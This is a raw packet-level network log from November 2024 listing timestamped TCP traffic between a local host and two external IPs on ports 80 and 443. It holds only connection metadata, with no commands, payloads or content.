Nov 20, 2024 16:58:12.709296942 CET  49175  80  192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:12.709340096 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.709377050 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.709391117 CET  49175  80  192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:12.709414959 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.709465981 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.709467888 CET  49175  80  192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:12.709498882 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.709537029 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.709547997 CET  49175  80  192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:12.709572077 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.709621906 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.709630966 CET  49175  80  192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:12.709676981 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.709713936 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.709727049 CET  49175  80  192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:12.709763050 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.709796906 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.709814072 CET  49175  80  192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:12.709834099 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.709882975 CET  49175  80  192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:12.709884882 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.709918976 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.709955931 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.709969044 CET  49175  80  192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:12.710001945 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.710043907 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.710052013 CET  49175  80  192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:12.710077047 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.710115910 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.710125923 CET  49175  80  192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:12.710150003 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.710186005 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.710200071 CET  49175  80  192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:12.710218906 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.710253000 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.710268974 CET  49175  80  192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:12.710285902 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.710319996 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.710333109 CET  49175  80  192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:12.710352898 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.710388899 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.710403919 CET  49175  80  192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:12.710422993 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.710455894 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.710483074 CET  49175  80  192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:12.710494995 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.710529089 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.710546970 CET  49175  80  192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:12.710562944 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.710597038 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.710613012 CET  49175  80  192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:12.710632086 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.710664988 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.710680962 CET  49175  80  192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:12.710697889 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.710731983 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.710747004 CET  49175  80  192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:12.710764885 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.710799932 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.710814953 CET  49175  80  192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:12.710834026 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.710866928 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.710884094 CET  49175  80  192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:12.710901976 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.710937023 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.710951090 CET  49175  80  192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:12.710969925 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.711007118 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.711024046 CET  49175  80  192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:12.711040020 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.711076975 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.711090088 CET  49175  80  192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:12.711111069 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.711144924 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.711159945 CET  49175  80  192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:12.711201906 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.711241007 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.711255074 CET  49175  80  192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:12.711273909 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.711308002 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.711323023 CET  49175  80  192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:12.711354971 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.711400986 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.711405039 CET  49175  80  192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:12.711460114 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.711509943 CET  49175  80  192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:12.711680889 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.711976051 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.712040901 CET  49175  80  192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:12.713706970 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.714005947 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.714061022 CET  49175  80  192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:12.715877056 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.716121912 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.716175079 CET  49175  80  192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:12.718236923 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.718396902 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.718451977 CET  49175  80  192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:12.720513105 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.720658064 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.720721960 CET  49175  80  192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:12.723089933 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.723102093 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.723146915 CET  49175  80  192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:12.724769115 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.725191116 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.725244045 CET  49175  80  192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:12.727063894 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.727569103 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.727624893 CET  49175  80  192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:12.729367971 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.729557991 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.729609013 CET  49175  80  192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:12.751810074 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.751825094 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.751874924 CET  49175  80  192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:12.753006935 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.753021002 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.753062010 CET  49175  80  192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:12.754595041 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.754607916 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.754654884 CET  49175  80  192.168.2.22  192.3.220.29
Nov 20, 2024 16:58:12.760210037 CET  443  49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:12.760288954 CET  49174  443  192.168.2.22  142.215.209.78
Nov 20, 2024 16:58:12.760313034 CET  443  49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:12.769634008 CET  443  49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:12.769736052 CET  49174  443  192.168.2.22  142.215.209.78
Nov 20, 2024 16:58:12.769757032 CET  443  49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:12.778429031 CET  443  49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:12.778512001 CET  49174  443  192.168.2.22  142.215.209.78
Nov 20, 2024 16:58:12.778527975 CET  443  49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:12.784827948 CET  443  49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:12.784893036 CET  49174  443  192.168.2.22  142.215.209.78
Nov 20, 2024 16:58:12.784908056 CET  443  49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:12.793417931 CET  443  49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:12.793508053 CET  49174  443  192.168.2.22  142.215.209.78
Nov 20, 2024 16:58:12.793519974 CET  443  49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:12.799947023 CET  443  49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:12.800004005 CET  49174  443  192.168.2.22  142.215.209.78
Nov 20, 2024 16:58:12.800018072 CET  443  49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:12.806516886 CET  443  49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:12.806579113 CET  49174  443  192.168.2.22  142.215.209.78
Nov 20, 2024 16:58:12.806591988 CET  443  49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:12.814264059 CET  443  49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:12.814344883 CET  49174  443  192.168.2.22  142.215.209.78
Nov 20, 2024 16:58:12.814358950 CET  443  49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:12.818232059 CET  443  49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:12.818293095 CET  49174  443  192.168.2.22  142.215.209.78
Nov 20, 2024 16:58:12.818309069 CET  443  49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:12.824340105 CET  443  49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:12.824395895 CET  49174  443  192.168.2.22  142.215.209.78
Nov 20, 2024 16:58:12.824409962 CET  443  49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:12.829972982 CET  443  49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:12.830063105 CET  49174  443  192.168.2.22  142.215.209.78
Nov 20, 2024 16:58:12.830075979 CET  443  49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:12.830115080 CET  443  49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:12.830157995 CET  49174  443  192.168.2.22  142.215.209.78
Nov 20, 2024 16:58:12.830163956 CET  443  49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:12.830179930 CET  443  49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:12.830224037 CET  49174  443  192.168.2.22  142.215.209.78
Nov 20, 2024 16:58:12.830231905 CET  443  49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:12.830262899 CET  443  49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:12.830288887 CET  49174  443  192.168.2.22  142.215.209.78
Nov 20, 2024 16:58:12.830293894 CET  443  49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:12.830305099 CET  49174  443  192.168.2.22  142.215.209.78
Nov 20, 2024 16:58:12.830326080 CET  443  49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:12.830348015 CET  80  49175  192.3.220.29  192.168.2.22
Nov 20, 2024 16:58:12.830370903 CET  49174  443  192.168.2.22  142.215.209.78
Nov 20, 2024 16:58:12.830375910 CET  443  49174  142.215.209.78  192.168.2.22
Nov 20, 2024 16:58:12.830391884 CET  443  49174  142.215.209.78  192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.830432892 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:12.830437899 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.830477953 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:12.834249973 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.834290981 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.834383011 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.835031986 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.835045099 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.835076094 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.835356951 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.835400105 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.836082935 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.837609053 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.837651014 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.838144064 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.839654922 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.839699030 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.840224028 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.841001987 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.841015100 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.841053009 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.842407942 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.842607021 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.842659950 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.843780041 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.844135046 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.844181061 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.845287085 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.845685959 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.845729113 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.847044945 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.847165108 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.847215891 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.848308086 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.848531961 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.848575115 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.849741936 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.849852085 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.849901915 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.851232052 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.851344109 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.851392984 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.852664948 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.852852106 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.852900028 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.854125977 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.854229927 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.854274988 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.855600119 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.855808973 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.855849981 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.856987000 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.857142925 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.857198954 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.858392000 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.858566046 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.858613968 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.859865904 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.859987020 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.860030890 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.861367941 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.861458063 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.861505985 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.863012075 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.863209963 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.863250971 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.864387989 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.864473104 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.864510059 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.865649939 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.865699053 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.865739107 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.867069960 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.867830038 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.867876053 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.868993998 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.869199038 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.869246960 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.870245934 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.870322943 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.870369911 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.871397018 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.871553898 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.871602058 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.872824907 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.872925997 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.872971058 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.874413013 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.874435902 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.874483109 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.875710011 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.876094103 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.876144886 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.877159119 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.877285004 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.877340078 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.878622055 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.878804922 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.878869057 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.880043983 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.880168915 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.880234003 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.881453037 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.881613970 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.881665945 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.882899046 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.883366108 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.883424044 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.884366989 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.884583950 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.884650946 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.885776043 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.885858059 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.885909081 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.887181997 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.887337923 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.887393951 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.888694048 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.888951063 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.889004946 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.890147924 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.890413046 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.890465021 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.891520977 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.891875982 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.891927958 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.892997980 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.893178940 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.893232107 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.894491911 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.894723892 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.894772053 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.895842075 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.897283077 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.897342920 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.897387981 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.897496939 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.897543907 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.898746967 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.898835897 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.898894072 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.900170088 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.900816917 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.900878906 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.901623011 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.901760101 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.901813984 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.903063059 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.904181004 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.904243946 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.904501915 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.904592991 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.904644012 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.906018019 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.906209946 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.906260014 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.907681942 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.907833099 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.907887936 CET4917580192.168.2.22192.3.220.29
